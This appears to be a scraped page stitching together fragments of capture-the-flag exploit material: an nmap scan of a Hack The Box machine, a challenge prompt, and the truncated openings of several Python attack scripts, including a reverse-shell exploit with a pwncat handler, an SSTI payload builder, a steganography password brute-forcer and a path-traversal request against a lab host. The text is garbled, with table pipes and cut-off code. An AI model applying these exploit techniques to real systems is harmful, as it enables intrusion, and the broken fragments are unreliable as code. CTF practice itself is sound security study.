kali@kali:/home/kali/Desktop/HTB/box/Sizzle $ nmap -p- -v -sVC -oA nmap/full 10.10.10.103
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
#!/usr/bin/env python3 | |
"""Rusta Rhymes - Flag4All - Exploit | |
Usage: | |
exploit.py <url> <revshell_ip> <revshell_port> [--handler] | |
Options: | |
-h --help Show this screen. | |
--handler Automaticly setup a pwncat-cs handler on defined port |
My app is faulty can you get the flag?? https://smug.flag4all.sh Format du flag : flag{xxx}
app/app.py
#!/usr/bin/env python3 | |
import requests | |
import pgpy | |
from pgpy.constants import PubKeyAlgorithm, KeyFlags, HashAlgorithm, SymmetricKeyAlgorithm, CompressionAlgorithm | |
from urllib3.exceptions import InsecureRequestWarning | |
import base64 | |
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) | |
def createPGPKeysPayload(ssti_payload): |
#!/usr/bin/env python3 | |
import subprocess | |
import threading | |
import sys | |
compressed = True | |
def try_password(threads_i, i, password, steg_file): | |
try: | |
print(' '*74+'\r'+f"[{i}] Thread {threads_i} try password : {password}", end='\r') |
#!/usr/bin/env python3 | |
import sys, threading, requests | |
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd' | |
cookie = {'SESSA0': 'a'} | |
# find nginx worker processes | |
r = requests.post(URL, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie) | |
cpus = r.text.count('processor') |
charset = string.ascii_uppercase + string.digits | |
template = """ | |
@font-face{ | |
font-family: def; | |
src: url(/static/fonts/Georgia.ttf); | |
} | |
@font-face{ | |
font-family: poc; | |
src: url(/static/fonts/GeorgiaBold.ttf); |
#!/usr/bin/env python3 | |
import requests | |
import string | |
import random | |
import sys | |
from urllib3.util import SKIP_HEADER | |
from collections import OrderedDict | |
import subprocess | |
from threading import Thread | |
import socket |
#!/usr/bin/env python3 | |
import requests | |
import os | |
import subprocess | |
import asyncio | |
import threading | |
import netifaces | |
import smtpd | |
import asyncore |